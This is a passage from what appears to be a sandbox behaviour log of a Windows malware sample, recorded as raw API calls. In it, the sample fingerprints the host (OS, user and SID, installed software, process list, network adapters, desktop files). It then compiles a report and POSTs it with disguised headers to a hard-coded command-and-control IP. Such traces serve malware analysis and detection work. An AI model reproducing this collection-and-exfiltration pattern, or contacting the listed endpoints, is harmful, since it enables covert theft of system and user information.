dwFlags=0x0) returned 0x613918 [0030.376] WinHttpConnect (hSession=0x613918, pswzServerName="api.ipaddress.com", nServerPort=0x50, dwReserved=0x0) returned 0x624fb8 [0030.404] WinHttpOpenRequest (hConnect=0x624fb8, pwszVerb="GET", pwszObjectName="/myip?format=txt", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0x625158 [0030.405] WinHttpSendRequest (in: hRequest=0x625158, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0 | out: lpOptional=0x0*) returned 1 [0030.521] WinHttpReceiveResponse (hRequest=0x625158, lpReserved=0x0) returned 1 [0030.521] WinHttpQueryDataAvailable (in: hRequest=0x625158, lpdwNumberOfBytesAvailable=0x0 | out: lpdwNumberOfBytesAvailable=0x0) returned 1 [0030.522] WinHttpReadData (in: hRequest=0x625158, lpBuffer=0x7f13c0, dwNumberOfBytesToRead=0x20, lpdwNumberOfBytesRead=0xe2194c | out: lpBuffer=0x7f13c0*, lpdwNumberOfBytesRead=0xe2194c*=0xe) returned 1 [0030.522] WinHttpCloseHandle (hInternet=0x613918) returned 1 [0030.522] WinHttpCloseHandle (hInternet=0x624fb8) returned 1 [0030.522] WinHttpCloseHandle (hInternet=0x625158) returned 1 [0030.522] WinHttpCloseHandle (hInternet=0x613918) returned 0 [0030.523] WinHttpCloseHandle (hInternet=0x624fb8) returned 0 [0030.523] WinHttpCloseHandle (hInternet=0x625158) returned 0 [0030.523] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="HARDWARE\\DESCRIPTION\\System\\CentralProcessor", ulOptions=0x0, samDesired=0x20019, phkResult=0xe21900 | out: phkResult=0xe21900*=0x190) returned 0x0 [0030.523] RegQueryValueExA (in: hKey=0x190, lpValueName="ProcessorNameString", lpReserved=0x0, lpType=0x0, lpData=0x352398, lpcbData=0xe2190c*=0x80 | out: lpType=0x0, lpData=0x352398*=0x0, lpcbData=0xe2190c*=0x80) returned 0x2 [0030.523] RegCloseKey (hKey=0x190) returned 0x0 [0030.523] GetSystemInfo (in: lpSystemInfo=0x7f13e8 | out: lpSystemInfo=0x7f13e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0030.523] GlobalMemoryStatusEx (in: lpBuffer=0x7f13e8 | out: lpBuffer=0x7f13e8) returned 1 [0030.523] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0xe218bc | out: phkResult=0xe218bc*=0x190) returned 0x0 [0030.523] RegQueryValueExA (in: hKey=0x190, lpValueName="ProductName", lpReserved=0x0, lpType=0x0, lpData=0x352428, lpcbData=0xe218c8*=0x40 | out: lpType=0x0, lpData=0x352428*=0x57, lpcbData=0xe218c8*=0x17) returned 0x0 [0030.523] RegCloseKey (hKey=0x190) returned 0x0 [0030.523] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0xe218bc | out: phkResult=0xe218bc*=0x190) returned 0x0 [0030.523] RegQueryValueExA (in: hKey=0x190, lpValueName="CSDVersion", lpReserved=0x0, lpType=0x0, lpData=0x352468, lpcbData=0xe218c8*=0x40 | out: lpType=0x0, lpData=0x352468*=0x0, lpcbData=0xe218c8*=0x40) returned 0x2 [0030.523] RegCloseKey (hKey=0x190) returned 0x0 [0030.523] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0xe218bc | out: phkResult=0xe218bc*=0x190) returned 0x0 [0030.523] RegQueryValueExA (in: hKey=0x190, lpValueName="ProductId", lpReserved=0x0, lpType=0x0, lpData=0x3524a8, lpcbData=0xe218c8*=0x40 | out: lpType=0x0, lpData=0x3524a8*=0x0, lpcbData=0xe218c8*=0x40) returned 0x2 [0030.524] RegCloseKey (hKey=0x190) returned 0x0 [0030.524] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0xe218bc | out: phkResult=0xe218bc*=0x190) returned 0x0 [0030.524] RegQueryValueExA (in: hKey=0x190, lpValueName="RegisteredOwner", lpReserved=0x0, lpType=0x0, lpData=0x3524e8, lpcbData=0xe218c8*=0x40 | out: lpType=0x0, lpData=0x3524e8*=0x4d, lpcbData=0xe218c8*=0xa) returned 0x0 [0030.524] RegCloseKey (hKey=0x190) returned 0x0 [0030.524] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0xe218bc | out: phkResult=0xe218bc*=0x190) returned 0x0 [0030.524] RegQueryValueExA (in: hKey=0x190, lpValueName="RegisteredOrganization", lpReserved=0x0, lpType=0x0, lpData=0x352528, lpcbData=0xe218c8*=0x40 | out: lpType=0x0, lpData=0x352528*=0x4d, lpcbData=0xe218c8*=0xa) returned 0x0 [0030.524] RegCloseKey (hKey=0x190) returned 0x0 [0030.524] LoadLibraryA (lpLibFileName="Netapi32") returned 0x74990000 [0030.837] GetProcAddress (hModule=0x74990000, lpProcName="NetUserGetInfo") returned 0x74941be2 [0030.964] LoadLibraryA (lpLibFileName="Netapi32") returned 0x74990000 [0030.965] GetProcAddress (hModule=0x74990000, lpProcName="NetApiBufferFree") returned 0x749813d2 [0030.965] GetUserNameA (in: lpBuffer=0x352568, pcbBuffer=0xe218ec | out: lpBuffer="aETAdzjz", pcbBuffer=0xe218ec) returned 1 [0030.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x352568, cbMultiByte=-1, lpWideCharStr=0xe218f4, cchWideChar=64 | out: lpWideCharStr="aETAdzjz") returned 9 [0030.965] NetUserGetInfo (in: servername=0x0, username="aETAdzjz", level=0x1, bufptr=0xe218f0 | out: bufptr=0x61d658*(usri1_name="aETAdzjz", usri1_password=0x0, usri1_password_age=0x111a518, usri1_priv=0x2, usri1_home_dir="", usri1_comment="", usri1_flags=0x10201, usri1_script_path="")) returned 0x0 [0031.330] NetApiBufferFree (Buffer=0x61d658) returned 0x0 [0031.330] NetUserGetInfo (in: servername=0x0, username="aETAdzjz", level=0x17, bufptr=0xe218f0 | out: bufptr=0x609840*(usri23_name="aETAdzjz", usri23_full_name="", usri23_comment="", usri23_flags=0x10201, usri23_user_sid=0x60986c*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68)))) returned 0x0 [0031.332] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=-1, lpMultiByteStr=0x3525a8, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 1 [0031.333] ConvertSidToStringSidA () returned 0x1 [0031.333] NetApiBufferFree (Buffer=0x609840) returned 0x0 [0031.333] GetLocaleInfoA (in: Locale=0x400, LCType=0x59, lpLCData=0x352630, cchData=16 | out: lpLCData="en") returned 3 [0031.333] GetLocaleInfoA (in: Locale=0x400, LCType=0x5a, lpLCData=0x352640, cchData=16 | out: lpLCData="US") returned 3 [0031.333] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Control\\TimeZoneInformation", ulOptions=0x0, samDesired=0x20019, phkResult=0xe21720 | out: phkResult=0xe21720*=0x1ac) returned 0x0 [0031.333] RegQueryValueExA (in: hKey=0x1ac, lpValueName="ActiveTimeBias", lpReserved=0x0, lpType=0x0, lpData=0x35262c, lpcbData=0xe2172c*=0x4 | out: lpType=0x0, lpData=0x35262c*=0x0, lpcbData=0xe2172c*=0x4) returned 0x0 [0031.333] RegCloseKey (hKey=0x1ac) returned 0x0 [0031.333] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Control\\TimeZoneInformation", ulOptions=0x0, samDesired=0x20019, phkResult=0xe21720 | out: phkResult=0xe21720*=0x1ac) returned 0x0 [0031.333] RegQueryValueExA (in: hKey=0x1ac, lpValueName="TimeZoneKeyName", lpReserved=0x0, lpType=0x0, lpData=0xe2185c, lpcbData=0xe2172c*=0x80 | out: lpType=0x0, lpData=0xe2185c*=0x47, lpcbData=0xe2172c*=0x80) returned 0x0 [0031.333] RegCloseKey (hKey=0x1ac) returned 0x0 [0031.333] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\Greenwich Standard Time", ulOptions=0x0, samDesired=0x20019, phkResult=0xe21720 | out: phkResult=0xe21720*=0x1ac) returned 0x0 [0031.334] RegQueryValueExA (in: hKey=0x1ac, lpValueName="Display", lpReserved=0x0, lpType=0x0, lpData=0x352650, lpcbData=0xe2172c*=0x80 | out: lpType=0x0, lpData=0x352650*=0x28, lpcbData=0xe2172c*=0x1a) returned 0x0 [0031.334] RegCloseKey (hKey=0x1ac) returned 0x0 [0031.334] GetModuleHandleW (lpModuleName="kernel32") returned 0x759f0000 [0031.334] GetProcAddress (hModule=0x759f0000, lpProcName="GetDiskFreeSpaceExW") returned 0x75a1d50f [0031.334] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x33e0f8 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\") returned 0x25 [0031.334] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\", lpFreeBytesAvailableToCaller=0xe21968, lpTotalNumberOfBytes=0xe21970, lpTotalNumberOfFreeBytes=0x0 | out: lpFreeBytesAvailableToCaller=0xe21968, lpTotalNumberOfBytes=0xe21970, lpTotalNumberOfFreeBytes=0x0) returned 1 [0031.334] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0xe21990 | out: Wow64Process=0xe21990) returned 1 [0031.334] GetNativeSystemInfo (in: lpSystemInfo=0xe2194c | out: lpSystemInfo=0xe2194c*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0031.334] _vsnprintf (in: _DstBuf=0x3972e8, _MaxCount=0x193f, _Format="CPU: %d x %s\r\nArchitecture: %s\r\nRAM: %dMB free / %dMB total (%u%% used)\r\nHard Disk: %dMB free / %dMB total\r\n\r\nWindows Version: %s%s%s%s%s\r\nRegistered to: %s%s%s%s {%s}\r\nLocale: %s_%s (%s)\r\n\r\nUser Info: %s%s%s%s%s\r\nSID: %s\r\n\r\n%s\r\n[Tasklist]\r\n%s\r\n[LocalAdapters]\r\nPublic IP: %s\r\n%s\r\n[DesktopList]\r\n%s\r\n", _ArgList=0xe21900 | out: _DstBuf="CPU: 2 x \r\nArchitecture: 64bit\r\nRAM: 1404MB free / 2047MB total (31% used)\r\nHard Disk: 499747MB free / 523785MB total\r\n\r\nWindows Version: Windows 7 Professional (64-bit)\r\nRegistered to: Microsoft (Microsoft) {}\r\nLocale: en_US ((UTC) Monrovia, Reykjavik)\r\n\r\nUser Info: aETAdzjz [ADMIN]\r\nSID: S-1-5-21-2345716840-1148442690-1481144037-1000\r\n\r\nApplication List (x86):\r\nAdobe Flash Player 10 Plugin (10.3.183.90)\r\nGoogle Chrome (59.0.3071.115)\r\nMozilla Firefox 25.0 (x86 en-US) (25.0)\r\nMozilla Maintenance Service (25.0)\r\nJava 7 Update 71 (7.0.710)\r\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (11.0.61030.0)\r\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (12.0.30501.0)\r\nMicrosoft Visual C++ 2005 Redistributable (8.0.61001)\r\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)\r\nAdobe Reader X MUI (10.0.0)\r\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (11.0.61030.0)\r\nMicrosoft Visual C++ 2017 Redistributable (x64) - 14.10.25017 (14.10.25017.0)\r\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)\r\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)\r\nMicrosoft Visual C++ 2017 Redistributable (x86) - 14.10.25017 (14.10.25017.0)\r\n\r\n\r\nApplication List (x64):\r\nAdobe Flash Player 11 ActiveX 64-bit (11.2.202.233)\r\nMicrosoft Project Professional 2016 - en-us (16.0.4266.1003)\r\nMicrosoft Office Professional Plus 2016 - en-us (16.0.4266.1003)\r\nMicrosoft Visio Professional 2016 - en-us (16.0.4266.1003)\r\nMicrosoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (10.0.40219)\r\nMicrosoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (9.0.30729.6161)\r\nMicrosoft .NET Framework 4.6 (4.6.00081)\r\nMicrosoft Visual C++ 2005 Redistributable (x64) (8.0.61000)\r\n\r\n[Tasklist]\r\nImage Name PID\r\n========================= ========\r\n[System Process] 0\r\nSystem 4\r\nsmss.exe 264\r\ncsrss.exe 332\r\nwininit.exe 380\r\ncsrss.exe 392\r\nwinlogon.exe 432\r\nservices.exe 476\r\nlsass.exe 484\r\nlsm.exe 492\r\nsvchost.exe 600\r\nsvchost.exe 664\r\nsvchost.exe 712\r\nsvchost.exe 788\r\nsvchost.exe 860\r\naudiodg.exe 928\r\nsvchost.exe 1016\r\nsvchost.exe 376\r\nspoolsv.exe 352\r\nsvchost.exe 1048\r\nOfficeClickToRun.exe 1244\r\ntaskhost.exe 1252\r\ndwm.exe 1376\r\nexplorer.exe 1412\r\ntaskeng.exe 1536\r\ntaskeng.exe 1744\r\nONENOTEM.EXE 1788\r\nWmiPrvSE.exe 276\r\ntaskhost.exe 1892\r\nastronomy wrote lies springfield.exe 588\r\nnav_king_forums.exe 324\r\nbodiestournamentsrickfold.exe 532\r\ncombinations_horizon.exe 844\r\nbrowsing contributions winter tab.exe 2052\r\nplanets-legends-retailers-declaration.exe 2068\r\ntell russia foo.exe 2084\r\ncells designed.exe 2100\r\ncuts_hill.exe 2116\r\nolympic.exe 2132\r\nchristopher counting nose ve.exe 2156\r\nsubmit.exe 2172\r\nearthquake_mysql_organizer.exe 2188\r\nmultiple-diamonds-salon-hepatitis.exe 2204\r\nnevadaworthstakeholders.exe 2220\r\nterrace.exe 2236\r\ngraphic-conspiracy-dialogue-opt.exe 2252\r\nltd_ul_catholic_interracial.exe 2268\r\nseptfleet.exe 2292\r\nintroductory_flickr_wool.exe 2308\r\nhour.exe 2324\r\nprayer lord miniature carmen.exe 2340\r\nWINWORD.EXE 2572\r\nsvchost.exe 2596\r\nOSPPSVC.EXE 2668\r\niexplore.exe 2788\r\n\r\n[LocalAdapters]\r\nPublic IP: 87.142.158.201\r\nEthernet adapter Local Area Connection:\r\n\r\n Name. . . . . . . . . . . . . . . : {48FF7F4F-BE3A-4930-AA03-2DDC08A41806}\r\n Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection\r\n Physical Address. . . . . . . . . : CC-5C-75-C6-04-C3\r\n IPv4 Address. . . . . . . . . . . : 192.168.0.170\r\n Subnet Mask . . . . . . . . . . . : 255.255.255.0\r\n Default Gateway . . . . . . . . . : 192.168.0.1\r\n\r\n\r\n[DesktopList]\r\naI CUDcC.ots\r\ncGrfM8oH.doc\r\ndesktop.ini\r\ndNtk2fNjp Mbizik.mp3\r\nDoNotOpen2.doc\r\nEqHdMD-3K0xL_D.bmp\r\nG37WHGIbFg3wzhLVQ.docx\r\ngxW2s0j281Hz\r\nHDp1bpbz0-TXvM.mp4\r\nhG5Op2p8GuyBNUntgcA.png\r\nIgyjnet9AhqNwP8DgJm.mp3\r\nIIrLUWEr.jpg\r\niy6tp.gif\r\njDmUvWUHoGS7Vg.bmp\r\nJjry5fw0Yd.pdf\r\nkm6YX3LYfgr.mkv\r\nK_9ZLrfCOrG5rTd.pps\r\nk_iCXR-bnWbcU.bmp\r\nlt9CqV92673g0Lu.mp3\r\nn th.ots\r\notpAypOJX.mkv\r\nQaSMp6.m4a\r\nRSJB0F47q.m4a\r\ns4vD.docx\r\nSGmEIVI3PW8MCc1.mp4\r\nSwBNN.mkv\r\ntgso.mp3\r\ntnIg9vWecUiEPCXO.gif\r\nV7so575sYIofX.xlsx\r\nWBtT5K3Kg-sosznB6A.bmp\r\nWi0r.pptx\r\nYBJH.bmp\r\nZy0EaSem6.jpg\r\n_ PYnhNqrZx.png\r\n~$NotOpen2.doc\r\n\r\n") returned 5013 [0031.334] strstr (_Str="http://103.236.150.14", _SubStr="http://") returned="http://103.236.150.14" [0031.334] GetLocalTime (in: lpSystemTime=0xe15124 | out: lpSystemTime=0xe15124*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x2, wDay=0x17, wHour=0x16, wMinute=0x27, wSecond=0x23, wMilliseconds=0x1ed)) [0031.334] CreateFileA (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\fxsapidebuglogfile.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0031.334] GetLocalTime (in: lpSystemTime=0xe15118 | out: lpSystemTime=0xe15118*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x2, wDay=0x17, wHour=0x16, wMinute=0x27, wSecond=0x23, wMilliseconds=0x1ed)) [0031.335] CreateFileA (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\fxsapidebuglogfile.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0031.335] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x613918 [0031.335] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xe219ac, cbMultiByte=32, lpWideCharStr=0xe218e8, cchWideChar=32 | out: lpWideCharStr="103.236.150.14") returned 32 [0031.335] wcsstr (_Str="103.236.150.14", _SubStr=":") returned 0x0 [0031.335] WinHttpConnect (hSession=0x613918, pswzServerName="103.236.150.14", nServerPort=0x50, dwReserved=0x0) returned 0x62fcb0 [0031.335] rand () returned 11054 [0031.335] rand () returned 6820 [0031.335] rand () returned 8150 [0031.335] rand () returned 27317 [0031.335] rand () returned 15143 [0031.335] rand () returned 13649 [0031.335] rand () returned 18498 [0031.335] rand () returned 32593 [0031.335] rand () returned 28141 [0031.335] rand () returned 31852 [0031.335] rand () returned 16615 [0031.335] rand () returned 26304 [0031.335] rand () returned 4548 [0031.335] rand () returned 6074 [0031.335] rand () returned 6852 [0031.335] rand () returned 5399 [0031.335] rand () returned 5439 [0031.335] rand () returned 6932 [0031.335] rand () returned 15263 [0031.335] rand () returned 13581 [0031.335] rand () returned 9218 [0031.335] rand () returned 16407 [0031.335] rand () returned 238 [0031.335] WinHttpOpenRequest (hConnect=0x62fcb0, pwszVerb="GET", pwszObjectName="/getn/mpj.gif?y=cz3kz92r", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x100) returned 0x62fd98 [0031.335] WinHttpSetOption (hInternet=0x62fd98, dwOption=0x6, lpBuffer=0xe212a0, dwBufferLength=0x4) returned 1 [0031.335] WinHttpAddRequestHeaders (hRequest=0x62fd98, pwszHeaders="User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", dwHeadersLength=0xbe, dwModifiers=0x20000000) returned 1 [0031.335] rand () returned 20308 [0031.335] rand () returned 203 [0031.335] rand () returned 26652 [0031.335] rand () returned 2552 [0031.335] rand () returned 31786 [0031.335] rand () returned 16564 [0031.335] rand () returned 31338 [0031.336] rand () returned 27960 [0031.336] rand () returned 21291 [0031.336] WinHttpAddRequestHeaders (hRequest=0x62fd98, pwszHeaders="Host: cwy4io.info", dwHeadersLength=0x11, dwModifiers=0x20000000) returned 1 [0031.336] WinHttpAddRequestHeaders (hRequest=0x62fd98, pwszHeaders="Accept: text/html,text/javascript, q=0.9,*/*, q=0.8", dwHeadersLength=0x33, dwModifiers=0x20000000) returned 1 [0031.336] WinHttpAddRequestHeaders (hRequest=0x62fd98, pwszHeaders="Accept-Language: en-US", dwHeadersLength=0x16, dwModifiers=0x20000000) returned 1 [0031.336] WinHttpAddRequestHeaders (hRequest=0x62fd98, pwszHeaders="Accept-Encoding: gzip, deflate", dwHeadersLength=0x1e, dwModifiers=0x20000000) returned 1 [0031.336] rand () returned 19378 [0031.336] rand () returned 29355 [0031.336] rand () returned 23810 [0031.336] rand () returned 3433 [0031.336] rand () returned 18018 [0031.336] rand () returned 13213 [0031.336] rand () returned 32617 [0031.336] rand () returned 3518 [0031.336] rand () returned 18693 [0031.336] rand () returned 29194 [0031.336] rand () returned 32095 [0031.336] rand () returned 17249 [0031.336] rand () returned 1992 [0031.336] rand () returned 19450 [0031.336] rand () returned 3358 [0031.336] rand () returned 6840 [0031.336] WinHttpOpenRequest (hConnect=0x62fcb0, pwszVerb="POST", pwszObjectName="/bubafni/wllqc.asp", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x100) returned 0x630180 [0031.336] WinHttpSetOption (hInternet=0x630180, dwOption=0x6, lpBuffer=0xe212a0, dwBufferLength=0x4) returned 1 [0031.336] WinHttpAddRequestHeaders (hRequest=0x630180, pwszHeaders="User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", dwHeadersLength=0xbe, dwModifiers=0x20000000) returned 1 [0031.336] rand () returned 20554 [0031.336] rand () returned 24615 [0031.336] rand () returned 31687 [0031.336] rand () returned 28781 [0031.336] rand () returned 88 [0031.336] rand () returned 31153 [0031.336] rand () returned 31305 [0031.336] rand () returned 15044 [0031.336] rand () returned 23035 [0031.336] rand () returned 9235 [0031.336] rand () returned 12677 [0031.336] rand () returned 23852 [0031.336] rand () returned 22708 [0031.336] WinHttpAddRequestHeaders (hRequest=0x630180, pwszHeaders="Host: r.hgdlw.j5k.com", dwHeadersLength=0x15, dwModifiers=0x20000000) returned 1 [0031.337] WinHttpAddRequestHeaders (hRequest=0x630180, pwszHeaders="Accept: application/jason,application/xml, q=0.9,*/*, q=0.8", dwHeadersLength=0x3b, dwModifiers=0x20000000) returned 1 [0031.337] WinHttpAddRequestHeaders (hRequest=0x630180, pwszHeaders="Accept-Language: en-US", dwHeadersLength=0x16, dwModifiers=0x20000000) returned 1 [0031.337] WinHttpAddRequestHeaders (hRequest=0x630180, pwszHeaders="Accept-Encoding: gzip, deflate", dwHeadersLength=0x1e, dwModifiers=0x20000000) returned 1 [0031.337] time (in: timer=0x0 | out: timer=0x0) returned 0x5a67b9a7 [0031.337] srand (_Seed=0x5a67b9a7) [0031.337] rand () returned 11060 [0031.337] rand () returned 28316 [0031.337] rand () returned 11110 [0031.337] rand () returned 9908 [0031.337] rand () returned 3004 [0031.337] rand () returned 21503 [0031.337] rand () returned 24723 [0031.337] rand () returned 26739 [0031.337] rand () returned 28397 [0031.337] rand () returned 19556 [0031.337] rand () returned 16319 [0031.337] rand () returned 26392 [0031.337] rand () returned 16058 [0031.337] rand () returned 6399 [0031.337] rand () returned 18468 [0031.337] rand () returned 7307 [0031.337] rand () returned 26307 [0031.337] rand () returned 11014 [0031.337] rand () returned 18924 [0031.337] rand () returned 27862 [0031.337] rand () returned 32049 [0031.337] rand () returned 14601 [0031.337] rand () returned 30268 [0031.337] rand () returned 1569 [0031.337] rand () returned 29409 [0031.337] rand () returned 16002 [0031.337] rand () returned 12401 [0031.337] rand () returned 31969 [0031.337] rand () returned 3782 [0031.337] rand () returned 6573 [0031.337] rand () returned 1194 [0031.337] rand () returned 30796 [0031.337] GetLocalTime (in: lpSystemTime=0xe2167c | out: lpSystemTime=0xe2167c*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x2, wDay=0x17, wHour=0x16, wMinute=0x27, wSecond=0x23, wMilliseconds=0x1ed)) [0031.337] GetNativeSystemInfo (in: lpSystemInfo=0xe21658 | out: lpSystemInfo=0xe21658*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0031.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=-1, lpMultiByteStr=0xe217f8, cbMultiByte=175, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 1 [0031.338] GetLocalTime (in: lpSystemTime=0xe15094 | out: lpSystemTime=0xe15094*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x2, wDay=0x17, wHour=0x16, wMinute=0x27, wSecond=0x23, wMilliseconds=0x1ed)) [0031.338] CreateFileA (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\fxsapidebuglogfile.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0031.338] rand () returned 14472 [0031.338] rand () returned 15257 [0031.338] rand () returned 26502 [0031.338] rand () returned 784 [0031.338] rand () returned 22129 [0031.338] rand () returned 7807 [0031.338] rand () returned 9007 [0031.338] rand () returned 21572 [0031.338] rand () returned 17034 [0031.338] rand () returned 30292 [0031.338] rand () returned 5527 [0031.338] rand () returned 9375 [0031.338] rand () returned 6913 [0031.338] rand () returned 20378 [0031.338] rand () returned 9217 [0031.338] rand () returned 25576 [0031.338] rand () returned 29134 [0031.338] rand () returned 4219 [0031.338] rand () returned 1988 [0031.338] rand () returned 25261 [0031.338] rand () returned 8086 [0031.338] rand () returned 4120 [0031.338] rand () returned 22603 [0031.338] rand () returned 17464 [0031.338] rand () returned 15824 [0031.338] rand () returned 14367 [0031.338] rand () returned 30305 [0031.338] WinHttpAddRequestHeaders (hRequest=0x630180, pwszHeaders="Cookie: t6spv78=7QGzB/mzTI0gYNl+9Y8dzF4mv3yhvhYEzWoCa9Bi/aEoyg==; gjf121ga7=fEbpgCWpk2JltYKJOe7LfgZy3Ot9ZvRNLO+XEudpr0HK1eHE+0QBC8CzNITtocwEKgn3tMhUoP7IuYtDN3VZTQZ6YLZuWF7dDwRpkMA9vgI=; pmgv4k3t=ckceUyFYMq1ztU6k4DBxuHDFrwFiA7HX7NrAmVsLRYpBxOQIvwInGyoupXjVZ4bt/tQk7I7JZqYa16iiwFFZiaZk4QMNArkObjhQlmg16Cw=;", dwHeadersLength=0x130, dwModifiers=0xa0000000) returned 1 [0031.338] WinHttpAddRequestHeaders (hRequest=0x630180, pwszHeaders="Content-Length: 5026", dwHeadersLength=0x14, dwModifiers=0xa0000000) returned 1 [0031.338] WinHttpSendRequest (in: hRequest=0x630180, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x13a2, dwContext=0x0 | out: lpOptional=0x0*) returned 1 [0031.618] WinHttpWriteData (in: hRequest=0x630180, lpBuffer=0xe22a7e*, dwNumberOfBytesToWrite=0x13a2, lpdwNumberOfBytesWritten=0xe21804 | out: lpBuffer=0xe22a7e*, lpdwNumberOfBytesWritten=0xe21804*=0x13a2) returned 1 [0031.618] WinHttpReceiveResponse (hRequest=0x630180, lpReserved=0x0) returned 1 [0035.449] WinHttpQueryHeaders (in: hRequest=0x630180, dwInfoLevel=0x13, pwszName=0x0, lpBuffer=0x0, lpdwBufferLength=0xe21870, lpdwIndex=0x0 | out: lpBuffer=0x0, lpdwBufferLength=0xe21870, lpdwIndex=0x0) returned 0 [0035.449] GetLastError () returned 0x7a [0035.449] WinHttpQueryHeaders (in: 